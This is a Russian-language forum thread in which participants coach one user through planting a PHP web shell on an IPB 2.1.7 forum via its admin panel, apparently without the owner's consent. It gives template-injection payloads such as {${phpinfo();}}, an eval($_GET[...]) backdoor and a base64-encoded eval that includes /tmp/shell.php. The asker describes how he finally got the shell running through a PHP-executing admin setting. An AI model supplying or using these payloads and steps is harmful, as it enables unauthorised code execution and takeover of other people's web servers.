Есть админка ipb 2.1.7 можно ли залить шелл если нет ни одно папки с правами на запись ...?

Они запритили всё даже авики загружать..

шаблоны правятся?

могу изминять фрагменты шаблонов

ну инжектни пхп код тогда, в чем проблема.
{${код}}

ex: {${phpinfo();}}

Пасиб щя посмотрим=)

не идёт... при добавлении того же {${phpinfo();}} в шаблон он просто выводит белую страницу... на странице где этот шаблон =(

хмм если прописываю eval($_GET[ww]); и добовляю в адресной строке &ww=phpinfo()

то он мне выводит eval(phpinfo()); почему $_GET[] сработало а eval нет отключили ?

Вроде получилось залить в /tmp

форум находится тут
/home/blalba/www/forum
шелл залит сюда
/tmp/shell.php

нельзя никак на него попасть да?

допиши в шаблоны
include('/tmp/shell.php');

а лучше

{${eval(base64_decode(QGluY2x1ZGUoJy90bXAvc2hlbGwu cGhwJyk7));}}

всётаки в шаблонах не выполняется пхп а с {${код}} белая страница

смог через настройки инклюдить но результат не очень шелл висит показывает всё но если я попытаюсь нажать на ссылку или на функцию меня сразу сбрасывает на главную админки =\ млин сволочи=)

я добился цели залил шелл в настройка сделал добавить настройку и де выполнить пхп код инклюдил шелл ... и када обновил страницу могу им нормально пользоваца=) токо у них везде прова ограничены=\ я ваше ничё не могу делать .. стоко времени убил зря.. эххь